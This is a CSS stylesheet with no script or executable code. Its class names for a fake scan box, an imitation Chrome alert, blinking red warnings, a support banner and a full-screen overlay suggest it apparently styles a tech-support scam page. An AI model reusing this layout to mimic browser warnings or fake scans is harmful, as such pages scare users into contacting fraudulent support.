body {
  background: #fff;
  -webkit-user-select: none;
-ms-user-select: none;
user-select: none;
  /*
   background: url('bg.png');
  background-repeat: no-repeat;
  background-size: cover;
  */
font-family: "Calibri", sans-serif;
 overflow-y: hidden;
 overflow-x: hidden;
 }
 .top {
  padding-left: 10px;

 }
.progress {

  width: 250px;

background: #d1d1d1;
  height: 04px;

}

.progress .progress__bar {
  height: 100%;
  width: 0%;
  border-radius: 2px;
  background-color: #3182be;
  animation: fill-bar 6s 1;
}

@keyframes fill-bar {
  from {width: 0%;}
  to {width: 100%;}

}
.textc {
  color: grey;
  font-size: 13px;
}
.flex {
  display: flex;
}
.button {
background: #cccccc;
color: #000;
padding: 6px 32px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 13px;
margin: 4px 2px;
cursor: pointer;
font-weight:350;

}

 .centerright   img {
  max-width: 100%;
}
.centerright ul {
  padding: 0;
  list-style-type: none;
}
.centerright ul {
  columns: 3;
}
.centerright li {
  width: calc((100vw / 3) - 20px);
  display: inline-block;
}

.centerright  ul {
  display: flex;
}
.centerright ul {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(190px, 1fr));

}
.centerright {
position: absolute;
left: 70px;
top: 150px;
display: flex;

}
.btn:hover {
cursor:pointer;
}
    .box {
display: none;
position: absolute;
width: 723px;
height: 560px;
top: 49%;
z-index: 999;
margin-top: -255px;
left: 48%;

border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;

    background: #fff;

    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
    }
    .scan {
display: none;
position: absolute;
width: 723px;
height: 569px;
top: 49%;
z-index: 999;
margin-top: -255px;
left: 48%;
border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;



    background: #fff;

    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
    }
    .scan::-webkit-scrollbar {
  display: none;
}


.alert_popup{
  position: absolute;
  top: 4%;
  z-index: 9999;
  left: 33.5%;
  background: #1a73e8;
  width: 440px;
  text-align: left;
  color: #fff;
  padding-top: 4px;
  display: none;
  margin: 20px;
  transform: translate(-50%, -50%);
  padding: 0 10px;
}
.alert_popup p{font-size: 13px;padding-bottom: 10px;margin: 10px;line-height: 18px;}
.action_buttons a.active {
border: 1px solid #3B79ED;
font-weight: bold;
}
.action_buttons a {
float: right;
font-size: 12px;
margin-right: 15px;
padding: 6px 25px;
text-decoration: none;
color: #fff !important;
border: 1px solid #fff;
margin-top: 20px;
border-radius: 3px; /* 100% */

margin-bottom: 20px;
}
.cardcontainer {
animation: zoominoutsinglefeatured 4s infinite ;
border-radius: 10px;
}
@keyframes zoominoutsinglefeatured {
0% {
 transform: scale(1,1);
}
50% {
 transform: scale(1.1,1.1);
}
100% {
 transform: scale(1,1);
}
}

@keyframes zoomininsinglefeatured {
0% {
 transform: scale(1,1);
}
50% {
 transform: scale(1.1,1.1);
}
100% {
 transform: scale(1,1);
}
}






.greyside {
padding: 10px;
border-top-right-radius: 10px;
border-top-left-radius: 10px;
background:#e7e7e7;

}
.bottomselect {
padding: 10px;
border-bottom-right-radius: 10px;
border-bottom-left-radius: 10px;
background:#e7e7e7;

}
.lst{font-weight: 700;padding: 15px 30px;min-height: 285px;border-radius: 10px;border: 1px solid #fff;width: 560px;margin: 0 auto;background-color: #fff;box-shadow: rgb(0 0 0 / 25%) 0px 54px 55px, rgb(0 0 0 / 12%) 0px -12px 30px, rgb(0 0 0 / 12%) 0px 4px 6px, rgb(0 0 0 / 17%) 0px 12px 13px, rgb(0 0 0 / 9%) 0px -3px 5px;z-index: 99999;position: absolute;top: 50%;left: 51%;cursor: pointer;transform: translate(-50%, -50%);display: none;}
.ilb {
display: inline-block;
}
.headers {
width: 535px;
margin-top: 7px;
padding-bottom: 15px;
}
.logo3 {margin: 0 7px -6px 0;width: 25px;height: 25px;}
.title2 img {
position: absolute;
width: 3%;
top: 17px;
right: 17px;
}
#txtintro {
clear: both;
padding-top: 5px;
font-size: 16px;
font-weight: 700;
text-align: center;
}
.colo-rd {
color: #ff0000;
}
#banner {
margin: 5px auto;
display: block;
width: 280px;
}
#disclaimer {
margin: 5px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.support {
font-weight: bold;
font-size: 21px;
color: #1a73e8;
font-family: inherit;
}
#bottom {
margin: 12px 0;
height: 50px;
display: flex;
border-top: 1px solid #d6d5d5;
}
#badge{height: 25px;margin-top: 18px;width: 25px;}
.title3 {
font-size: 18px;
font-weight: 700;
text-transform: capitalize;
position: relative;
width: 36%;
top: 21px;
left: 13px;
}
#bottom ul {
list-style-type: none;
margin-left: 12px;
margin-top: 6px;
}
#bottom ul li {
display: inline-block;
float: left;
padding-left: 13px;
margin-top: 13px;
}
.button2 {border-radius: 4px;padding: 10px 30px 10px 30px;color: #fff;border: 1px solid #1a73e8;background-color: #1a73e8;font-size: 18px;font-weight: 700;text-align: center;cursor: pointer;}
.buttons {
border-radius: 4px;
padding: 10px 30px 10px 30px;
color: #fff;
background-color: #1a73e8;
font-size: 18px;
font-weight: 700;
text-align: center;
cursor: pointer;
}
a {
color: #007bff;
text-decoration: none;
background-color: transparent;
}
a:hover {
color: #0056b3;
text-decoration: underline;
}
.button2:hover {color: #fff;/* background-color: #1a73e8; *//* border-color: #1a73e8; */}
.blink {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}
.blink2 {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}


#footer {width: 100%;position: fixed;bottom: 0;background-color: #1a73e8;z-index: 9999;padding: 10px 34px;color: #fff;font-size: 18px;height: 46px;cursor: pointer;left: 0;}
#footertxt, #footertxt2 {
font-size: 20px;
}
#footertxt img {width: 23px;vertical-align: text-top;}
:host {
display: inline-block;
overflow: hidden;
text-align: initial;
white-space: nowrap;
}
.bg .bgimg {
position: absolute;
top: 60px;
left: 0px;
width: 100%;
}
.black {
width: 100%;
height: 100%;
background-color: rgb(0 0 0 / 47%);
opacity: 0.7;
transition: 1s;
position: absolute;
top: -190px;
left:0
}
.colo-rd .blink{
font-size: 18px;
display: inline-block;
margin-bottom: 5px;
}
.logo12{width: 22px;display: inline-block;vertical-align: middle;max-width: 100%;margin-right: 5px;margin-top: -2px;}
ul.icon-links {
margin: 0px 0 20px 0;
padding: 0 0 0 15px;
list-style: none;
}
ul.icon-links li {
color: #fff;
font-size: 13px;
margin: 0;
font-weight: 400;
line-height: 20px;
transition: all .6s ease 0s;
}
ul.icon-links li img{
width: 18px;
vertical-align: middle;
padding-right: 5px;
}

.cross{position:absolute;top:2px;right:10px;font-weight:bolder;color:#888;text-decoration:none}a:focus{outline:0;border:0}.chrome-alert{position:fixed;top:-10px;left:0;right:0;z-index: 999999;}.chrome-alert>div{margin:0 auto;width:440px;background:#FBFBFB;border:1px solid #BABABA;border-radius:3px;box-shadow:0 2px 0 rgba(0,0,0,.3);position:relative;padding: 0px 15px;}.chrome-alert h1{font-size:15px;font-weight:400;margin:0 0 5px;padding:5px 10px;color:#414141}.chrome-alert p{font-size:12px;padding:0 10px;color:#414141;margin: 12px 0;padding: 0;}.chrome-alert .action_buttons{overflow:auto}.chrome-alert .action_buttons a{float:right;font-size:12px;margin-right:15px;padding: 8px 25px;text-decoration:none;margin-top: 5px;border-radius:2px;margin-bottom: 10px;margin-right: 5px;border: 1px solid #3B79ED;color: #3B79ED !important;}.chrome-alert .action_buttons a.active{background: #3B79ED;border:1px solid #3B79ED;font-weight:600;color: #fff !important;}.chrome-alert .content-box{max-height:440px;overflow:auto;margin:0 20px}.chrome-alert .content-box p{padding:0;margin-left:0}.chrome-alert label{padding: 0px;font-size:12px;color: #000;vertical-align: text-top;}.chrome-alert label:hover{color:#3B79ED}.chrome-alert label:focus{color:#3B79ED;outline:dotted}

#welcomeDiv{
  background-color: rgb(0, 0, 0);
  height: auto;
  width: 550px;
  margin-left: 31%;
  position: absolute;
  z-index: 2147483647;
  text-align: center;
  margin-top: -8px;
  padding: 14px 35px;
  line-height: 23px;
  display:none;
  top: 0;
}

#chat-box{
  background-color: #fff;
  padding: 15px;
  position: fixed;
  bottom: 10%;
  right: 13px;
  z-index: 99999999;
  border-radius: 10px;
      display: none;
}
#chat-box img{
      color: #000;
  font-size: 16px;
  font-weight: 600;
  margin-left: 25px;
  width: 25px;
}
#chat-box h4{
      width: 217px;
  font-size: 20px;
  text-align: center;
  padding-top: 6px;
  margin: 0px 35px;
  display: block;
}
#chat-box a{
  text-align: center;
  margin: 0px auto;
  display: block;
}
#chat-box p {
  font-size: 16px;
  text-align: center;
  padding-top: 7px;
  font-weight: normal;
}
#chat-box .arrow-down{
  position: absolute;
  font-size: 47px;
  color: #fff;
  bottom: -35px;
  left: 65px;
}

